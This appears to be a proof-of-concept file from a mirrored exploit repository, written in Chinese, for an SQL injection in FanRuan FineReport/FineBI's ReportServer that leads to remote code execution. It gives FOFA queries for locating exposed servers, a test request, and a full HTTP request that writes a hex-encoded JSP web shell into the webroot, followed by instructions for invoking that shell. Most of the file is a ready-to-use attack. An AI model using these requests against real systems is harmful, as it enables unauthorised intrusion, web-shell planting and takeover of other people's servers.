admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 05:54:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/帆软报表/帆软系统ReportServer存在SQL注入漏洞导致RCE.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

57 lines
2.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 帆软系统ReportServer存在SQL注入漏洞导致RCE
帆软工具软件存在RCE
访问URL:/webroot/decision/view/ReportServer?test=&n=可执行GET参数n中的SQL语句该漏洞是由于帆软自带的sqlite-jdbc-x.x.x.x.jar驱动导致。影响范围FineReport和FineBI所有版本产品。HW爆出的day没有复现
## fofa
```yaml
body="isSupportForgetPwd"
app="帆软-FineReport"
```
## poc
```java
GET /webroot/decision/view/ReportServer?test=&n=${9*9}
HTTP/1.1
Host: 192.168.174.152:8075
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0)Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer:http://192.168.174.152:8075/webroot/decision/login?origin=1dc5fbd4-27eb-41b5-a43f-0623003685b4
Cookie: tenantId=default
```
![image-20240725213005972](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407252130095.png)
## 写文件
注:打过一次之后还要再打的话要改下数据库名称
```java
GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
```
`http://127.0.0.1:8080/webroot/aaa.jsp?a=javax.script.ScriptEngineManager` 密码 b
![image-20240725213111459](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407252131536.png)
## 参考文章
- https://y4tacker.github.io/2024/07/23/year/2024/7/%E6%9F%90%E8%BD%AFReport%E9%AB%98%E7%89%88%E6%9C%AC%E4%B8%AD%E5%88%A9%E7%94%A8%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%86%E8%8A%82/
- https://mp.weixin.qq.com/s/AliftiLevjz5HB9uL0DOqQ
Reference in New Issue View Git Blame Copy Permalink